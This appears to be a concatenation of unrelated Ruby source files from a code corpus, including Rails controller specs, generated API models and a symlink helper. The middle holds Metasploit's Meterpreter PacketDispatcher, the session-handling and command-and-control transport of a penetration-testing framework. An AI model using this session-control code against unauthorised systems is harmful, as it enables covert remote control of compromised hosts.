# the stdlib Pathname.unlink balks when removing a symlink -
# this method will call File.unlink instead when dealing with
# a symlink
def SymlinkHandler.unlink(filename)
if(!filename.kind_of?(Pathname))
filename = Pathname.new(filename.to_s)
end
if filename.symlink?()
File.unlink filename.expand_path
else
filename.unlink()
end
end
# Returns true if a file is a broken symlink
def SymlinkHandler.broken?(symlink)
if(!symlink.kind_of?(Pathname))
symlink = Pathname.new(symlink.to_s)
end
if(!symlink.symlink?())
return(false)
end
# expand the path and catch the ensuing error in the case of a broken link
begin
symlink.realpath()
rescue
if($!.kind_of?(Errno::ENOENT) and $!.to_s =~ /^no such file/i)
return(true)
else
raise($!)
end
end
return(false)
end
# Returns whether a symlink is actually pointing to +filename+.
# Both parameters may be strings or File objects. This method
# is used by Cfenjin to ascertain that when a symlink exists it
# points to the right file. It returns false when +filename+
# does not exist (i.e. symlink points to nothing).
#
# In the case the symlink does not exist a FileOpsWrongFiletypeError
# is thrown.
def SymlinkHandler.points_to?(symlink, filename)
if(!filename.kind_of?(Pathname))
filename = Pathname.new(filename.to_s)
end
if(!symlink.kind_of?(Pathname))
symlink = Pathname.new(symlink.to_s)
end
return false if !filename.exist?
raise FileOpsWrongFiletypeError if !symlink.symlink?
return filename.realpath.to_s == symlink.realpath.to_s
end
end
private
def FileOps.strip_protocol(filename)
return(filename.to_s[/^([a-zA-Z]+:\/\/)?(.*)$/,2])
end
end
end
| 31.277778 | 137 | 0.657155 |
912e61168e0fd399ba6dab9c012569b16620dd18 | 12,513 | require 'spec_helper'
describe AnswersController do
describe "PATCH #accept" do
before { login_user }
context 'when not Question author' do
let(:question) { create(:question) }
let(:answer) { create(:answer, question: question) }
before { patch :accept, question_id: question, id: answer }
it "doesn't accept answer" do
answer.reload
expect(answer.accepted).to be_false
end
it "responds with 403 status" do
expect(response.status).to eq(403)
end
end
context 'when Question author' do
let(:question) { create(:question, user: @user) }
let(:answer) { create(:answer, question: question) }
let!(:bounty) { create(:bounty, question: question) }
before { patch :accept, question_id: question, id: answer }
it "finds Answer to accept" do
expect(assigns(:answer)).to eq(answer)
end
context 'when no Answers accepted' do
it "toggles Answer accepted value" do
expect(assigns(:answer).accepted).to be_true
end
end
context 'when Answer already accepted' do
before { patch :accept, question_id: question, id: answer }
it "toggles Answer accepted value" do
expect(assigns(:answer).accepted).to be_false
end
end
it "awards Bounty if exists" do
bounty.reload
expect(bounty.winner).to eq(answer.user)
end
it "redirects to Answer Question" do
expect(response).to redirect_to question_path(question)
end
end
context 'when Question has accepted Answer' do
let(:question) { create(:question, user: @user) }
let!(:accepted_answer) { create(:answer, question: question,
accepted: true) }
let(:answer) { create(:answer, question: question) }
before { patch :accept, question_id: question, id: answer }
it "finds Answer Question" do
expect(assigns(:question)).to eq(question)
end
it "finds already accepted answer" do
expect(assigns(:question).accepted_answer).to eq(accepted_answer)
end
it "doesn't toggle Answer accepted value" do
expect(assigns(:answer).accepted).to be_false
end
it "responds with 403 status" do
expect(response.status).to eq(403)
end
end
context 'when Answer already accepted' do
let(:question) { create(:question, user: @user) }
let(:answer) { create(:answer, question: question, accepted: true) }
before { patch :accept, question_id: question, id: answer }
it "toggles Answer accepted value to false" do
expect(assigns(:answer).accepted).to be_false
end
it "redirects to Answer Question" do
expect(response).to redirect_to question_path(question)
end
end
end
describe "GET #by_user" do
let(:user) { create(:user) }
let(:question) { create(:question) }
let(:answer) { create(:answer, question: question) }
let(:answers) { create_list(:answer, 3, user: user, question: question) }
before { get :by_user, user_id: user }
it "assigns user Answers to @answers" do
expect(assigns(:answers)).to match_array(answers)
end
it "renders :by_user view" do
expect(response).to render_template 'by_user'
end
end
describe "GET #voted" do
let(:user) { create(:user) }
let(:answer1) { create(:answer) }
let(:answer2) { create(:answer) }
let(:answer3) { create(:answer) }
before do
create(:vote, voteable: answer1, user: user)
create(:vote, voteable: answer2, user: user)
get :voted, user_id: user
end
it "assigns user Answers to @answers" do
expect(assigns(:answers)).to eq Answer.voted_by(user.id)
end
it "renders :voted view" do
expect(response).to render_template 'voted'
end
end
describe "POST #create" do
let(:question) { create(:question) }
context 'when logged in' do
before { login_user }
context "with valid attributes" do
context 'with AJAX' do
it "saves new Answer to DB" do
expect {
post :create, answer: attributes_for(:answer),
question_id: question, format: :js
}.to change(question.answers, :count).by(1)
end
it "renders :create view" do
post :create, answer: attributes_for(:answer),
question_id: question, format: :js
expect(response).to render_template 'create'
end
end
context 'without AJAX' do
it "saves new Answer to DB" do
expect {
post :create, answer: attributes_for(:answer), question_id: question
}.to change(question.answers, :count).by(1)
end
it 'redirects to answered Question' do
post :create, answer: attributes_for(:answer), question_id: question
expect(request).to redirect_to(question_path(question))
end
end
end
context "with invalid attributes" do
context 'with AJAX' do
it "doesn't save new Answer to DB" do
expect {
post :create, answer: {body: ''}, question_id: question,
format: :js
}.to change(question.answers, :count).by(0)
end
it 'renders :create view' do
post :create, answer: {body: ''}, question_id: question, format: :js
expect(request).to render_template 'create'
end
end
context 'without AJAX' do
it "doesn't save new Answer to DB" do
expect{
post :create, answer: {body: ''}, question_id: question
}.to change(question.answers, :count).by(0)
end
it 'redirects to answered Question with error' do
post :create, answer: {body: ''}, question_id: question
expect(request).to render_template 'new'
end
end
end
end
context 'when not logged in' do
it "redirects to log in page" do
post :create, answer: attributes_for(:answer), question_id: question
expect(request).to redirect_to(new_user_session_path)
end
end
end
describe 'GET #edit' do
let(:question) { create(:question) }
context 'when Answer owner' do
subject { create(:answer, question: question, user: @user) }
before do
login_user
get :edit, id: subject, question_id: question
end
it "finds Answer to edit" do
expect(assigns(:answer)).to eq(subject)
end
it { should render_template 'edit' }
end
context 'when not Answer owner' do
subject { create(:answer, question: question) }
before do
login_user
get :edit, id: subject, question_id: question
end
it { should render_template 'static/error' }
end
context 'when not logged in' do
subject { create(:answer, question: question) }
before { get :edit, id: subject, question_id: question }
it "redirects to log in page" do
expect(request).to redirect_to(new_user_session_path)
end
end
end
describe 'PATCH #update' do
before { login_user }
let(:question) { create(:question) }
subject { create(:answer, user: @user, question: question,
body: 'Not updated body. Not updated body. Not updated body.') }
context 'with valid attributes' do
context "with AJAX" do
before do
patch :update, id: subject, question_id: question, format: :js,
answer: attributes_for(:answer,
body: 'Updated body! Updated body! Updated body! Updated body!')
end
it "finds Answer to edit" do
expect(assigns(:answer)).to eq(subject)
end
it 'updates @answer body' do
subject.reload
expect(subject.body).to eq('Updated body! Updated body! Updated body! Updated body!')
end
it "renders :update view" do
expect(response).to render_template 'update'
end
end
context "without AJAX" do
before do
patch :update, id: subject, question_id: question,
answer: attributes_for(:answer,
body: 'Updated body! Updated body! Updated body! Updated body!')
end
it "finds Answer to edit" do
expect(assigns(:answer)).to eq(subject)
end
it 'updates @answer body' do
subject.reload
expect(subject.body).to eq('Updated body! Updated body! Updated body! Updated body!')
end
it "redirects to the Answer Question" do
expect(response).to redirect_to subject.question
end
end
end
context "with invalid attributes" do
before do
patch :update, id: subject, question_id: question,
answer: attributes_for(:answer, body: 'Too short')
end
it "finds Answer for update" do
expect(assigns(:answer)).to eq(subject)
end
it "doesn't change @answer attributes" do
subject.reload
expect(subject.body).to eq('Not updated body. Not updated body. Not updated body.')
end
it "re-renders :edit view" do
expect(response).to render_template 'edit'
end
end
context "when not user's Answer" do
it "doesn't change @answer attributes" do
alien_answer = create(:answer, user: create(:user), question: question,
body: 'Not updated body. Not updated body.')
patch :update, id: alien_answer, question_id: question,
answer: attributes_for(:answer, body: 'Updated body! Updated body! Updated body!')
alien_answer.reload
expect(alien_answer.body).to eq('Not updated body. Not updated body.')
end
it "responds with 403 status" do
alien_answer = create(:answer, user: create(:user), question: question,
body: 'Not updated body. Not updated body.')
patch :update, id: alien_answer, question_id: question,
answer: attributes_for(:answer, body: 'Updated body! Updated body! Updated body!')
alien_answer.reload
expect(response.status).to eq(403)
end
end
end
describe "DELETE #destroy" do
context 'when not logged in' do
let(:question) { create(:question) }
let!(:answer) { create(:answer) }
it "doesn't delete Answer from DB" do
expect {
delete :destroy, id: answer, question_id: question
}.to_not change(Answer, :count)
end
it "redirects to login path" do
delete :destroy, id: answer, question_id: question
expect(response).to redirect_to new_user_session_path
end
end
context "when user's Answer" do
before { login_user }
let(:question) { create(:question) }
let!(:answer) { create(:answer, user: @user, question: question) }
context "with AJAX" do
it "deletes the requested Answer" do
expect {
delete :destroy, id: answer, question_id: question, format: :js
}.to change(@user.answers, :count).by(-1)
end
it "renders :destroy view" do
delete :destroy, id: answer, question_id: question, format: :js
expect(response).to render_template 'destroy'
end
end
context "without AJAX" do
it "finds Answer to delete" do
delete :destroy, id: answer, question_id: question
expect(assigns(:answer)).to eq(answer)
end
it "deletes the requested Answer" do
expect {
delete :destroy, id: answer, question_id: question
}.to change(@user.answers, :count).by(-1)
end
it "redirects to Answer's Question" do
delete :destroy, id: answer, question_id: question
expect(response).to redirect_to question_path(answer.question)
end
end
end
context "when not user's Answer" do
before { login_user }
let(:question) { create(:question) }
let!(:alien_answer) { create(:answer, question: question) }
it "doesn't delete Answer from DB" do
expect {
delete :destroy, id: alien_answer, question_id: question
}.to_not change(Answer, :count)
end
it "responds with 403 status" do
delete :destroy, id: alien_answer, question_id: question
expect(response.status).to eq(403)
end
end
end
end | 30.519512 | 95 | 0.607049 |
4a6a279caf3933fc2b3099a6738c7a89d2780ad1 | 265 | module ValidModelHashes
def valid_user_hash
{ :login => String.random(10),
:email => "#{String.random}@example.com",
:password => "sekret",
:password_confirmation => "sekret"
}
end
end
| 24.090909 | 64 | 0.501887 |
4a64800fda6218f75adee082d7a32e6e96a19484 | 11,583 | =begin
#SendinBlue API
#SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.12
=end
require 'date'
module SibApiV3Sdk
class GetCampaignStats
# List Id of email campaign (only in case of get email campaign(s)(not for global stats))
attr_accessor :list_id
# Number of unique clicks for the campaign
attr_accessor :unique_clicks
# Number of total clicks for the campaign
attr_accessor :clickers
# Number of complaints (Spam reports) for the campaign
attr_accessor :complaints
# Number of delivered emails for the campaign
attr_accessor :delivered
# Number of sent emails for the campaign
attr_accessor :sent
# Number of softbounce for the campaign
attr_accessor :soft_bounces
# Number of harbounce for the campaign
attr_accessor :hard_bounces
# Number of unique openings for the campaign
attr_accessor :unique_views
# Number of unsubscription for the campaign
attr_accessor :unsubscriptions
# Number of openings for the campaign
attr_accessor :viewed
# Number of deferred emails for the campaign
attr_accessor :deferred
# Total number of non-delivered campaigns for a particular campaign id.
attr_accessor :return_bounce
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'list_id' => :'listId',
:'unique_clicks' => :'uniqueClicks',
:'clickers' => :'clickers',
:'complaints' => :'complaints',
:'delivered' => :'delivered',
:'sent' => :'sent',
:'soft_bounces' => :'softBounces',
:'hard_bounces' => :'hardBounces',
:'unique_views' => :'uniqueViews',
:'unsubscriptions' => :'unsubscriptions',
:'viewed' => :'viewed',
:'deferred' => :'deferred',
:'return_bounce' => :'returnBounce'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'list_id' => :'Integer',
:'unique_clicks' => :'Integer',
:'clickers' => :'Integer',
:'complaints' => :'Integer',
:'delivered' => :'Integer',
:'sent' => :'Integer',
:'soft_bounces' => :'Integer',
:'hard_bounces' => :'Integer',
:'unique_views' => :'Integer',
:'unsubscriptions' => :'Integer',
:'viewed' => :'Integer',
:'deferred' => :'Integer',
:'return_bounce' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'listId')
self.list_id = attributes[:'listId']
end
if attributes.has_key?(:'uniqueClicks')
self.unique_clicks = attributes[:'uniqueClicks']
end
if attributes.has_key?(:'clickers')
self.clickers = attributes[:'clickers']
end
if attributes.has_key?(:'complaints')
self.complaints = attributes[:'complaints']
end
if attributes.has_key?(:'delivered')
self.delivered = attributes[:'delivered']
end
if attributes.has_key?(:'sent')
self.sent = attributes[:'sent']
end
if attributes.has_key?(:'softBounces')
self.soft_bounces = attributes[:'softBounces']
end
if attributes.has_key?(:'hardBounces')
self.hard_bounces = attributes[:'hardBounces']
end
if attributes.has_key?(:'uniqueViews')
self.unique_views = attributes[:'uniqueViews']
end
if attributes.has_key?(:'unsubscriptions')
self.unsubscriptions = attributes[:'unsubscriptions']
end
if attributes.has_key?(:'viewed')
self.viewed = attributes[:'viewed']
end
if attributes.has_key?(:'deferred')
self.deferred = attributes[:'deferred']
end
if attributes.has_key?(:'returnBounce')
self.return_bounce = attributes[:'returnBounce']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @unique_clicks.nil?
invalid_properties.push('invalid value for "unique_clicks", unique_clicks cannot be nil.')
end
if @clickers.nil?
invalid_properties.push('invalid value for "clickers", clickers cannot be nil.')
end
if @complaints.nil?
invalid_properties.push('invalid value for "complaints", complaints cannot be nil.')
end
if @delivered.nil?
invalid_properties.push('invalid value for "delivered", delivered cannot be nil.')
end
if @sent.nil?
invalid_properties.push('invalid value for "sent", sent cannot be nil.')
end
if @soft_bounces.nil?
invalid_properties.push('invalid value for "soft_bounces", soft_bounces cannot be nil.')
end
if @hard_bounces.nil?
invalid_properties.push('invalid value for "hard_bounces", hard_bounces cannot be nil.')
end
if @unique_views.nil?
invalid_properties.push('invalid value for "unique_views", unique_views cannot be nil.')
end
if @unsubscriptions.nil?
invalid_properties.push('invalid value for "unsubscriptions", unsubscriptions cannot be nil.')
end
if @viewed.nil?
invalid_properties.push('invalid value for "viewed", viewed cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @unique_clicks.nil?
return false if @clickers.nil?
return false if @complaints.nil?
return false if @delivered.nil?
return false if @sent.nil?
return false if @soft_bounces.nil?
return false if @hard_bounces.nil?
return false if @unique_views.nil?
return false if @unsubscriptions.nil?
return false if @viewed.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
list_id == o.list_id &&
unique_clicks == o.unique_clicks &&
clickers == o.clickers &&
complaints == o.complaints &&
delivered == o.delivered &&
sent == o.sent &&
soft_bounces == o.soft_bounces &&
hard_bounces == o.hard_bounces &&
unique_views == o.unique_views &&
unsubscriptions == o.unsubscriptions &&
viewed == o.viewed &&
deferred == o.deferred &&
return_bounce == o.return_bounce
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[list_id, unique_clicks, clickers, complaints, delivered, sent, soft_bounces, hard_bounces, unique_views, unsubscriptions, viewed, deferred, return_bounce].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = SibApiV3Sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.628169 | 839 | 0.623845 |
38983c23896f3b6b9a68be7a796fb2b87b23c85f | 137 | class AddUniqueToDeviceIdInFinders < ActiveRecord::Migration[5.0]
def change
add_index :finders, :device_id, unique: true
end
end
| 22.833333 | 65 | 0.773723 |
ed694f7591164a8a48704fffc4bcc765d09ca17f | 29 | require 'mws/reports/client'
| 14.5 | 28 | 0.793103 |
7aad03e3d1e71cb92a19f8fd483cdee5f6df50d5 | 14,997 | # -*- coding: binary -*-
require 'rex/post/meterpreter/packet_response_waiter'
require 'rex/logging'
require 'rex/exceptions'
module Rex
module Post
module Meterpreter
###
#
# Exception thrown when a request fails.
#
###
class RequestError < ArgumentError
def initialize(method, einfo, ecode=nil)
@method = method
@result = einfo
@code = ecode || einfo
end
def to_s
"#{@method}: Operation failed: #{@result}"
end
# The method that failed.
attr_reader :method
# The error result that occurred, typically a windows error message.
attr_reader :result
# The error result that occurred, typically a windows error code.
attr_reader :code
end
###
#
# Handles packet transmission, reception, and correlation,
# and processing
#
###
module PacketDispatcher
PacketTimeout = 600
##
#
# Synchronization
#
##
attr_accessor :comm_mutex
##
#
#
# Passive Dispatching
#
##
attr_accessor :passive_service, :send_queue, :recv_queue
def initialize_passive_dispatcher
self.send_queue = []
self.recv_queue = []
self.waiters = []
self.alive = true
# Ensure that there is only one leading and trailing slash on the URI
resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
self.passive_service = self.passive_dispatcher
self.passive_service.remove_resource(resource_uri)
self.passive_service.add_resource(resource_uri,
'Proc' => Proc.new { |cli, req| on_passive_request(cli, req) },
'VirtualDirectory' => true
)
end
def shutdown_passive_dispatcher
return if not self.passive_service
# Ensure that there is only one leading and trailing slash on the URI
resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
self.passive_service.remove_resource(resource_uri)
# If there are no more resources registered on the service, stop it entirely
if self.passive_service.resources.empty?
Rex::ServiceManager.stop_service(self.passive_service)
end
self.alive = false
self.send_queue = []
self.recv_queue = []
self.waiters = []
self.passive_service = nil
end
def on_passive_request(cli, req)
begin
resp = Rex::Proto::Http::Response.new(200, "OK")
resp['Content-Type'] = 'application/octet-stream'
resp['Connection'] = 'close'
self.last_checkin = Time.now
# If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
if req.body[0,4] == "RECV"
rpkt = send_queue.shift
resp.body = rpkt || ''
begin
cli.send_response(resp)
rescue ::Exception => e
send_queue.unshift(rpkt) if rpkt
elog("Exception sending a reply to the reader request: #{cli.inspect} #{e.class} #{e} #{e.backtrace}")
end
else
resp.body = ""
if req.body and req.body.length > 0
packet = Packet.new(0)
packet.from_r(req.body)
dispatch_inbound_packet(packet)
end
cli.send_response(resp)
end
rescue ::Exception => e
elog("Exception handling request: #{cli.inspect} #{req.inspect} #{e.class} #{e} #{e.backtrace}")
end
end
##
#
# Transmission
#
##
#
# Sends a packet without waiting for a response.
#
def send_packet(packet, completion_routine = nil, completion_param = nil)
if (completion_routine)
add_response_waiter(packet, completion_routine, completion_param)
end
bytes = 0
raw = packet.to_r
err = nil
# Short-circuit send when using a passive dispatcher
if self.passive_service
send_queue.push(raw)
return raw.size # Lie!
end
if (raw)
# This mutex is used to lock out new commands during an
# active migration.
self.comm_mutex.synchronize do
begin
bytes = self.sock.write(raw)
rescue ::Exception => e
err = e
end
end
if bytes.to_i == 0
# Mark the session itself as dead
self.alive = false
# Indicate that the dispatcher should shut down too
@finish = true
# Reraise the error to the top-level caller
raise err if err
end
end
return bytes
end
#
# Sends a packet and waits for a timeout for the given time interval.
#
def send_request(packet, t = self.response_timeout)
if not t
send_packet(packet)
return nil
end
response = send_packet_wait_response(packet, t)
if (response == nil)
raise TimeoutError.new("Send timed out")
elsif (response.result != 0)
einfo = lookup_error(response.result)
e = RequestError.new(packet.method, einfo, response.result)
e.set_backtrace(caller)
raise e
end
return response
end
#
# Transmits a packet and waits for a response.
#
def send_packet_wait_response(packet, t)
# First, add the waiter association for the supplied packet
waiter = add_response_waiter(packet)
# Transmit the packet
if (send_packet(packet).to_i <= 0)
# Remove the waiter if we failed to send the packet.
remove_response_waiter(waiter)
return nil
end
# Wait for the supplied time interval
waiter.wait(t)
# Remove the waiter from the list of waiters in case it wasn't
# removed
remove_response_waiter(waiter)
# Return the response packet, if any
return waiter.response
end
##
#
# Reception
#
##
#
# Monitors the PacketDispatcher's sock for data in its own
# thread context and parsers all inbound packets.
#
def monitor_socket
# Skip if we are using a passive dispatcher
return if self.passive_service
self.comm_mutex = ::Mutex.new
self.waiters = []
@pqueue = []
@finish = false
@last_recvd = Time.now
@ping_sent = false
self.alive = true
# Spawn a thread for receiving packets
self.receiver_thread = Rex::ThreadFactory.spawn("MeterpreterReceiver", false) do
while (self.alive)
begin
rv = Rex::ThreadSafe.select([ self.sock.fd ], nil, nil, 0.25)
ping_time = 60
# If there's nothing to read, and it's been awhile since we
# saw a packet, we need to send a ping. We wait
# ping_time*2 seconds before deciding a session is dead.
if (not rv and self.send_keepalives and Time.now - @last_recvd > ping_time)
# If the queue is empty and we've already sent a
# keepalive without getting a reply, then this
# session is hosed, and we should give up on it.
if @ping_sent and @pqueue.empty? and (Time.now - @last_recvd > ping_time * 2)
dlog("No response to ping, session #{self.sid} is dead", LEV_3)
self.alive = false
@finish = true
break
end
# Let the packet queue processor finish up before
# we send a ping.
if not @ping_sent and @pqueue.empty?
# Our 'ping' is actually just a check for eof on
# channel id 0. This method has no side effects
# and always returns an answer (regardless of the
# existence of chan 0), which is all that's
# needed for a liveness check. The answer itself
# is unimportant and is ignored.
pkt = Packet.create_request('core_channel_eof')
pkt.add_tlv(TLV_TYPE_CHANNEL_ID, 0)
waiter = Proc.new { |response, param|
@ping_sent = false
@last_recvd = Time.now
}
send_packet(pkt, waiter)
@ping_sent = true
end
next
end
next if not rv
packet = receive_packet
@pqueue << packet if packet
@last_recvd = Time.now
rescue ::Exception
dlog("Exception caught in monitor_socket: #{$!}", 'meterpreter', LEV_1)
@finish = true
self.alive = false
break
end
end
end
# Spawn a new thread that monitors the socket
self.dispatcher_thread = Rex::ThreadFactory.spawn("MeterpreterDispatcher", false) do
begin
# Whether we're finished or not is determined by the receiver
# thread above.
while(not @finish)
if(@pqueue.empty?)
::IO.select(nil, nil, nil, 0.10)
next
end
incomplete = []
backlog = []
while(@pqueue.length > 0)
backlog << @pqueue.shift
end
#
# Prioritize message processing here
# 1. Close should always be processed at the end
# 2. Command responses always before channel data
#
tmp_command = []
tmp_channel = []
tmp_close = []
backlog.each do |pkt|
if(pkt.response?)
tmp_command << pkt
next
end
if(pkt.method == "core_channel_close")
tmp_close << pkt
next
end
tmp_channel << pkt
end
backlog = []
backlog.push(*tmp_command)
backlog.push(*tmp_channel)
backlog.push(*tmp_close)
#
# Process the message queue
#
backlog.each do |pkt|
begin
if ! dispatch_inbound_packet(pkt)
# Keep Packets in the receive queue until a handler is registered
# for them. Packets will live in the receive queue for up to
# PacketTimeout, after which they will be dropped.
#
# A common reason why there would not immediately be a handler for
# a received Packet is in channels, where a connection may
# open and receive data before anything has asked to read.
if (::Time.now.to_i - pkt.created_at.to_i < PacketTimeout)
incomplete << pkt
end
end
rescue ::Exception => e
dlog("Dispatching exception with packet #{pkt}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
end
end
# If the backlog and incomplete arrays are the same, it means
# dispatch_inbound_packet wasn't able to handle any of the
# packets. When that's the case, we can get into a situation
# where @pqueue is not empty and, since nothing else bounds this
# loop, we spin CPU trying to handle packets that can't be
# handled. Sleep here to treat that situation as though the
# queue is empty.
if (backlog.length > 0 && backlog.length == incomplete.length)
::IO.select(nil, nil, nil, 0.10)
end
@pqueue.unshift(*incomplete)
if(@pqueue.length > 100)
dlog("Backlog has grown to over 100 in monitor_socket, dropping older packets: #{@pqueue[0 .. 25].map{|x| x.inspect}.join(" - ")}", 'meterpreter', LEV_1)
@pqueue = @pqueue[25 .. 100]
end
end
rescue ::Exception => e
dlog("Exception caught in monitor_socket dispatcher: #{e.class} #{e} #{e.backtrace}", 'meterpreter', LEV_1)
ensure
self.receiver_thread.kill if self.receiver_thread
end
end
end
#
# Parses data from the dispatcher's sock and returns a Packet context
# once a full packet has been received.
#
def receive_packet
return parser.recv(self.sock)
end
#
# Stop the monitor
#
def monitor_stop
if(self.receiver_thread)
self.receiver_thread.kill
self.receiver_thread = nil
end
if(self.dispatcher_thread)
self.dispatcher_thread.kill
self.dispatcher_thread = nil
end
end
##
#
# Waiter registration
#
##
#
# Adds a waiter association with the supplied request packet.
#
def add_response_waiter(request, completion_routine = nil, completion_param = nil)
waiter = PacketResponseWaiter.new(request.rid, completion_routine, completion_param)
self.waiters << waiter
return waiter
end
#
# Notifies a whomever is waiting for a the supplied response,
# if anyone.
#
def notify_response_waiter(response)
self.waiters.each() { |waiter|
if (waiter.waiting_for?(response))
waiter.notify(response)
remove_response_waiter(waiter)
break
end
}
end
#
# Removes a waiter from the list of waiters.
#
def remove_response_waiter(waiter)
self.waiters.delete(waiter)
end
##
#
# Dispatching
#
##
#
# Initializes the inbound handlers.
#
def initialize_inbound_handlers
@inbound_handlers = []
end
#
# Dispatches and processes an inbound packet. If the packet is a
# response that has an associated waiter, the waiter is notified.
# Otherwise, the packet is passed onto any registered dispatch
# handlers until one returns success.
#
def dispatch_inbound_packet(packet, client = nil)
handled = false
# If no client context was provided, return self as PacketDispatcher
# is a mixin for the Client instance
if (client == nil)
client = self
end
# Update our last reply time
client.last_checkin = Time.now
# If the packet is a response, try to notify any potential
# waiters
if ((resp = packet.response?))
if (notify_response_waiter(packet))
return true
end
end
# Enumerate all of the inbound packet handlers until one handles
# the packet
@inbound_handlers.each { |handler|
handled = nil
begin
if ! resp
handled = handler.request_handler(client, packet)
else
handled = handler.response_handler(client, packet)
end
rescue ::Exception => e
dlog("Exception caught in dispatch_inbound_packet: handler=#{handler} #{e.class} #{e} #{e.backtrace}", 'meterpreter', LEV_1)
return true
end
if (handled)
break
end
}
return handled
end
#
# Registers an inbound packet handler that implements the
# InboundPacketHandler interface.
#
def register_inbound_handler(handler)
@inbound_handlers << handler
end
#
# Deregisters a previously registered inbound packet handler.
#
def deregister_inbound_handler(handler)
@inbound_handlers.delete(handler)
end
protected
attr_accessor :receiver_thread # :nodoc:
attr_accessor :dispatcher_thread # :nodoc:
attr_accessor :waiters # :nodoc:
end
end; end; end
| 26.637655 | 164 | 0.596186 |
e913a036f752a16c11194537abc6dce68346c4f8 | 5,804 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# ChangeCustomProtectionRuleCompartmentDetails model.
class Waas::Models::ChangeCustomProtectionRuleCompartmentDetails
# **[Required]** The [OCID](https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the compartment into which the resource should be moved. For information about moving resources between compartments, see [Moving Resources to a Different Compartment](https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes).
#
# @return [String]
attr_accessor :compartment_id
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'compartmentId'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
